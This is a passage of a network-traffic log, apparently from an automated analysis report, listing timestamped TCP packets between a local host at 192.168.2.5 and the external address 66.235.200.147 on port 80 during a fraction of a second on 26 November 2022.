Nov 26, 2022 11:17:40.098956108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098958969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.098979950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.098997116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099003077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099024057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099045038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099061012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099081993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099101067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099102020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099123955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099138021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099148035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099167109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099184990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099186897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099209070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099227905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099229097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099251032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099265099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099275112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099293947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099311113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099315882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099338055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099355936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099358082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099379063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099390984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099402905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099422932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099441051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099442959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099463940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099483013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099484921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099505901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099519968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099528074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099565029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099584103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099586010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099610090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099620104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099637032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099654913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099673986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099677086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099698067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099711895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099721909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099742889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099761009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099764109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099785089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099803925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099807024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099828005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099842072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099852085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099872112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099889040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099895000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099915981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099932909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099939108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099957943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.099971056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.099982977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100009918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100024939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100034952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100056887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100076914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100076914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100100994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100111961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100128889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100147963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100166082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100168943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100192070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100204945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100217104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100239038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100255966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100261927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100285053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100301027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100308895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100332022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100346088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100357056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100377083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100398064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100399017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100421906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100435972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100445986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100467920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100488901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100490093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100512981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100527048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100538015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100559950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100578070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100584030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100606918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100622892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100630045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100652933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100671053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100675106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100697994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100717068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100719929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100743055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100758076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100768089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100789070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100809097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100811005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100833893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100847960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100857973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100878954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100897074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100899935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100925922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100934029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.100951910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100976944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.100991964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101001978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101022005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101038933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101044893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101066113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101083040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101089001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101111889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101128101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101135015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101155996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101169109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101181030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101201057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101217985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101222992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101247072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101260900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101272106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101293087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101310015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101316929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101339102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101350069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101365089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101385117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101397991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101408005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101428986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101440907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101454020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101474047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101491928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101494074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101516008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101531029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101540089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101562023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101579905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101583004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101605892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101622105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101630926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101651907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101666927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101675987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101699114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101716995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101722002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101744890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101758957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101771116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101792097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101811886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101814985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101838112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101852894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101865053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101886034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101907015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101907015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101929903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101944923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.101954937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101974964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.101991892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102003098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102016926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102034092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102041960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102061987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102080107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102083921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102104902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102125883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102125883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102148056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102164030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102170944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102190971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102205038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102215052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102235079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102251053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102256060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102277040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102293015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102298021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102319956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102334023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102341890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102361917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102380037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102381945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102405071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102421045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102427959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102448940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102464914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102471113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102494001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102513075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102514982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102536917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102550983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102562904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102583885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102606058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102606058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102631092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102647066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102653980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102674007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102691889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102698088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102719069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102739096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102741957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102762938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102777958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102788925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102807999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102827072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102829933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102850914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102866888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102885008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102906942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102926970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102929115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102950096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102969885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.102972984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.102994919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103012085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103024960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103037119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103056908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103060961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103081942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103100061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103101969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103125095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103137016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103148937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103169918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103188992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103192091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103213072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103230953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103250027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103250027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103271008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103286028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103303909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103321075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103331089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103344917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103362083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103367090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103388071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103404999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103413105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103430033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103447914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103452921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103475094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103492975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103494883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103516102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103530884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103538990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103559971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103578091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103581905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103619099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103627920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103643894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103662968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103682041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103683949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103705883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103719950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103730917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103750944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103770971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103770971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103794098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103809118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103816986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103837013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103851080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103859901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103880882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103899002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103912115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103931904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103950024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.103955984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103979111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.103995085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.104002953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104027033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.104042053 CET	49707	80	192.168.2.5	66.235.200.147
